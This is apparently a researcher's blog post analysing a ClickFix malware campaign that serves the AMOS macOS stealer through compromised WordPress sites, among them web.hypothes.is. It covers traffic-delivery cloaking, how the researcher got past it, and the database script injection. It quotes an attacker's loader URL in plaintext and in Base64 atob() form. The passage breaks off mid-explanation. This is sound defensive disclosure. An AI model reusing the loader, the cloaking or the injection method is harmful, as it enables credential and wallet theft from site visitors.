The "Ghost" in the Annotations Uncovering a Global macOS Malware Campaign Neil Lofland Feb 27, 2026 Share Hypothesis is a tool that millions of students, researchers, and educators use every day to annotate the web. It’s the kind of site you’d never think twice about trusting. That’s exactly what makes it such a valuable target. In the last 48 hours, I identified an active, large-scale malware distribution campaign leveraging a compromised injection on web.hypothes.is and at least five other major websites — including a United Way chapter and a children’s gaming company. The attackers aren’t exploiting a browser zero-day or a novel vulnerability. They’re exploiting something much harder to patch: human trust. This is a deep dive into the ClickFix social engineering framework and its delivery of AMOS (Atomic macOS Stealer) , a sophisticated “Malware-as-a-Service” payload that drains keychains, crypto wallets, and browser credentials. I’ll walk through the full attack chain, show you how to decode the obfuscated payloads yourself, and explain why this campaign is so difficult to detect. 1. The Discovery: Bypassing the TDS “Gate” Standard security scanners often miss these injections entirely, and that’s by design. The threat actors use a Traffic Delivery System (TDS) — think of it as a hyper-paranoid bouncer standing between the compromised website and the malware payload. A TDS is an intermediary server that decides, in real time, whether to serve malicious content or the clean original site. It makes this decision by fingerprinting every visitor before they even see the page. The TDS checks the visitor’s IP address against databases of known VPN exit nodes, data center IP ranges, Tor relays, and corporate networks. It inspects the User-Agent string to filter out automated scanners, bots, and non-target operating systems. Some TDS implementations even check screen resolution, browser language, and timezone to build a confidence score. The result: if you’re a security researcher scanning from an office network, a cloud VM, or behind a VPN, you see the perfectly legitimate website. The injection is invisible. The site owner’s own monitoring tools — also running from data centers — see nothing wrong. VirusTotal’s URL scanner sees nothing wrong. It’s a ghost. While auditing web.hypothes.is , I noticed a fake Cloudflare “Human Verification” overlay. But when I returned using a different browser in private browsing mode, the overlay was gone. The page was spotless. I tried a VPN IP — same thing: clean. This is the TDS doing its job. Did I imagine it? Was it a fluke? I didn’t have the initial exchange because you don’t normally sit there with developer tools running. Even if I happened to, sometimes the TDS’s will detect developer tools as well by using JavaScript to detect when the browser enters a debugging state or when specific UI changes occur. Even if I got past the TDS I would need something more powerful for the traffic capture. How I caught it: To get past the gate, I had to look like a real, unsuspecting home user. I switched to a cellular hotspot (which provides a residential IP that won’t appear in any VPN or data center blocklist), spoofed a fresh browser User-Agent, and captured all of the traffic with Zed Attack Proxy (ZAP) for further analysis, being careful not to enable anything that might give away ZAP’s presence like annotations. Just a clean vanilla install of ZAP driving a Firefox in a manual session. Only then did the ghost reappear — the fake Cloudflare modal slid back into view, pixel-perfect and waiting. Now I had everything I needed to peer into the inner workings of this campaign. 2. The Attack Chain: From WordPress to Terminal The infection is a classic multi-stage delivery designed to bypass browser protections by tricking the user into compromising themselves. Stage 1: The WordPress Injection The attacker has successfully compromised the WordPress backend of several high-profile sites — most likely through a vulnerable plugin or stolen admin credentials. Once inside, they don’t modify the theme files directly (which would be easier to spot in a file integrity scan). Instead, they inject a script block into the site’s database, typically through a “Header/Footer Scripts” plugin or a similar custom code injection feature. This means the malicious code is served dynamically from the database on every page load but never exists as a file on disk. I identified a redundant script loader tucked around line 700 of the landing page HTML. The attacker included the same loader twice — once in plaintext and once obfuscated — as a redundancy measure. If one gets stripped by a WAF or content filter, the other still fires: Plaintext Gate: https://api.aloparatoriuz.com/LokwiUHhajhWnbX Obfuscated Gate: atob('aHR0cHM6Ly9hcGkuYWxvcGFyYXRvcml1ei5jb20vTG9rd2lVSGhhamhXbmJY') Decoding the obfuscation yourself: The atob() function is a built-in browser API that decodes Base64 strings. You can verify what the...